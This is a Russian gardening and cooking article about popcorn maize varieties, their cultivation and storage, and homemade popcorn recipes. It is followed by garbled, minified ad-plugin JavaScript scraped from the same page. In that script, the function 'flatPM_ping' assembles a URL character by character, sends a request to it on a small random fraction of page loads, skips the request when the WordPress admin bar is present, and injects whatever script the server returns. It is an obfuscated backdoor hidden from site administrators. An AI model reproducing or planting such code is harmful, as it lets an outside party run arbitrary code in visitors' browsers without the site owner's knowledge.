Вы можете сделать свое лакомство из зерен, что были выращены на участке. Можно кукурузу и купить, но только не в торговых точках, а у тех, кто растит культуру именно для попкорна самостоятельно. Принцип приготовления очень простой и для микроволновой печи, и для газовой плиты.

Совет! Перед тем как начать готовить лакомство, зерна лучше подержать полчаса в холоде, так они будут лучше готовиться, и раскроются все.

Итак, вы наливаете масло в чашку, которую можно закрыть крышкой. Масла нужно немного, чтобы попкорн не был слишком жирным. Если вы используете микроволновую печь, то зерна в чашке под крышкой поставьте на 3-4 минуты. В закрытой сковороде готовят на медленном огне до момента, когда начнется треск. После чего сковороду снимают с плиты, но не открывают. Зерна будут продолжать раскрываться, пока все не превратятся в попкорн. Просто, быстро и вкусно.

Совет! Чтобы ваш попкорн был похож на магазинный, добавьте соль или карамель, в зависимости от того, что вы любите больше, соленое лакомство или сладкое.

Надеемся, теперь вы будете внимательнее при походе в кинотеатр, парки, где продается попкорн. Лучше не покупать его здесь, а сделать для своей семьи дома.

Все материалы на сайте Priroda-Znaet.ru представлены исключительно для ознакомления в информационных целях. Перед применением любых средств консультация с врачом ОБЯЗАТЕЛЬНА!

Ольга Королева

Опубликовано: 22-08-2017

Обновлено: 08-11-2019

Ольга на нашем сайте отвечает за подбор авторов и качество публикуемых материалов.

Названия сортов кукурузы для попкорна, их выращивание и хранение

Среди сортов кукурузы популярностью пользуется лопающаяся кукуруза. В народе называется просто попкорн, ее любят как дети, так и взрослые. Это полезный, вкусный и низкокалорийный продукт, содержащий витамины и микроэлементы.

Получить такую продукцию можно при самостоятельном выращивании на дачном участке. Главное, выбрать правильный сорт, соблюдать условия по уходу, а после — нагревать зернышки на сковороде и есть попкорн.

Какими должны быть семена для получения попкорна?

Кукурузные семена можно разделить на две разновидности — сахарный сорт (или маис) и для попкорна. Чтобы зерна лопалась, они должные иметь небольшое содержание крахмала, белка и жира, тонкую оболочку, напоминающую покрытую лаком поверхность, но плотно прилегающую к поверхности семян.

Она лопается, когда ее нагревают на сковородке при закрытой крышке. В зернах начинает равномерно распределяться пар, который заставляет зерно лопаться и растушевываться. Если зерна созрели и правильно хранились, то кукуруза отлично раскроется.

Известные сорта для попкорна

Для получения любимого попкорна подойдут известные популярные сорта лопающейся кукурузы:

  1. Вулкан. Это растение имеет высоту до 2 метров. Является теплолюбивой культурой. Зерна окрашены в желтый цвет. Семена напоминают рисовые зерна. Початки имеют максимальную длину 22 см. Из каждого можно получить около 120 грамм зерна.
  2. Лопай. Отличается небольшой высотой — около 130 см. Несмотря на это культура дает большой урожай. Початки, окрашенные в желтый цвет, имеют зерна до 250 грамм.
  3. Зея. Считается раннеспелым сортом. Она созревает через 80 дней. Зерна имеют темноватый красный цвет. С одной стороны они заострены, с другой — округлые.
  4. Гостинец. Тоже раннеспелый сорт. Он имеет ряд преимуществ перед другими разновидностями еще и в том, что легко переносит засуху. Початки имеют длину около 20 см, зерна окрашены в желтый цвет, растение вырастает высотой около 2 метров.
  5. Внучкина радость. Сорт раннеспелый. Зерна при созревании приобретают оранжевый цвет, початки небольшие — около 12 см. Вырастает до 1,5 метров. Сорт ценится за высокую урожайность. Но эти растения требовательны к поливу и внесению подкормок, не переносят засуху.

Среди ранних сортов встречаются раннеспелые растения, початки которых небольшие, 5–10 см. Высота тоже небольшая — 120 см. Название этого сорта Красный попкорн. Привлекает отличной урожайностью и вкусовыми качествами.

Взращивание

Чтобы самим делать попкорн, вначале необходимо выбрать подходящий для попкорна сорт кукурузы, который соответствует природным условиям, и постараться его культивировать на своем садовом участке.

Чтобы понять, какой нужен сорт, следует учитывать следующие нюансы и особенности:

  1. Кукурузу можно сажать на глинистых, суглинистых, черноземных, подзолистых почвах. Она не растет только на песке, это связано с тем, что кукуруза вырастает высоко: большинство сортов достигает 2 метров.
  2. Чтобы растению удержаться на ветру, потребуется сформировать мощные корни, а на сыпучей почве это невозможно. Плохо, если кукуруза поляжет, это скажется на урожае.
  3. Все сорта кукурузы относятся к теплолюбивым растениям, поэтому необходимо сажать семена, когда установится постоянная температура и земля прогреется до 12–15 °С.
  4. Выращивание лучше происходит на хорошо освещаемом солнцем месте.
  5. Желательно чтобы участок был ровным.
  6. Не подходят болотистые места. Кукурузе не подходит застаивание воды после поливки или дождя.
  7. Необходимо помнить: каждый год рекомендуется менять место посадки кукурузы, с учетом ее предшественников. Подойдет место грядок, если на нем росли томаты, картофель, морковь и свекла.
  8. Кукурузу не рекомендуется сажать в один ряд, так как резко упадет урожайность. Необходимо посадить около 3–5 рядов.
  9. Перед тем как сажать зерна кукурузы в открытый грунт, их рекомендуется замачивать сутки в теплой воде, предварительно обработав марганцовкой. Как только они набухнут, пора сеять.

Необходимо выбрать метод посадки, соблюдая расстояние 50х50. Почву предварительно культивируют граблями, с добавлением азотных удобрений. Потребуется выдернуть все сорняки, а лунки полить, затем в каждую посадить по 3 зернышка, углубляя на 2–3 см и присыпая землей.

Чтобы почва не сохла, можно накрыть лунки пластиковыми колпаками, изготовленными из прозрачных бутылок. Всходы рекомендуется ждать около 12 дней.

После того как кукуруза для попкорна подрастет, из трех растений выбирается самое сильное, остальные удаляют.

Если погода благоприятная, то за кукурузой несложно ухаживать, особенно если сажать сорта, устойчивые к засушливым условиям. Таким растениям понадобится вода только 1 раз в неделю, а влаголюбивые растения, такие как Внучкина радость, требуют почти ежедневного полива.

Для получения большого урожая рекомендуется растения подкармливать, а для этого нужно знать, какие удобрения вносить лучше:

  • После того как кукуруза взойдет, 3–4 раза в месяц подкармливать органическими удобрениями.
  • Когда появятся «метелки», то понадобятся азотнофосфорные удобрения.
  • Когда начнется формирование початков, желательно внести азотно-калийные удобрения.

Лопающиеся сорта кукурузы не переносит рост сорняков, поэтому необходимо их постоянно удалять. Также негативно могут повлиять на урожай вредители — мотылек, шведская муха и проволочники.

Важно знать: если нет ветра, кукуруза плохо опыляется, поэтому потребуется самостоятельно трясти стебли, чтобы пыльца на метелках попадала на зародыши початков, расположенные в пазухах листьев.

Как собирать и хранить урожай?

Початки следует собирать только тогда, когда они подсохнут, если собрать раньше в сыром виде, то раскрываемость кукурузы при приготовлении попкорна, уменьшится. Для ускорения созревания рекомендуется во время ее роста початки раскрыть, обнажив зерна, но «одежку» обрывать не рекомендуется.

После сбора важно знать, как правильно хранить. Больше всего для початков подходит прохладное, проветриваемое помещение. Очень важно, чтобы оно было сухим. Подсушенные початки складывают в тканевый мешок или сетку на хранение, при этом не рекомендуется отделять зерна.

Как приготовить воздушную кукурузу в домашних условиях?

Приготовить попкорн намного легче, чем сварить какое-либо блюдо. Для этого требуется подготовить сковороду, лучше чугунную и газовую плиту.
Для получения попкорна с карамелью понадобится:

  • кукурузные зерна, примерно 1/4 стакана;
  • 2 столовые ложки растительного масла;
  • сахарный песок — 1 столовая ложка.

Для приготовления следует взять сухую сковороду, налить в нее растительное масло, накрыть крышкой и поставить разогревать на плиту. Затем высыпать зерна кукурузы, сахарный песок и обязательно накрыть крышкой.

После того как содержимое сковороды хорошо прогреется, можно будет услышать, как зерна начнут раскрываться. Как только все затихнет, содержимое сковороды лучше всего пересыпать в глубокую тарелку, чтобы карамель не начала гореть.

Чтобы получить попкорн с сахарной пудрой, необходимо приготовить примерно такое же количество зерен для попкорна, растительного масла, но готовить воздушную кукурузу без добавления сахара. После того как попкорн приготовится, его пересыпают в миску и сверху посыпают сахарной пудрой, хорошенько перемешав. Можно и солью: на вкус любителей.

Попкорн считается питательным продуктом, способствующим насыщению. Тем, кто следит за своим весом, следует помнить, что это низкокалорийный продукт. Готовят его из особых сортов кукурузы, которые можно вырастить на своем садовом участке. Особых трудностей выращивание зерен не имеет: главное, дать кукурузе хорошо созреть, прежде чем собирать початки. Хранить в тканевом, хорошо дышащем мешке.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};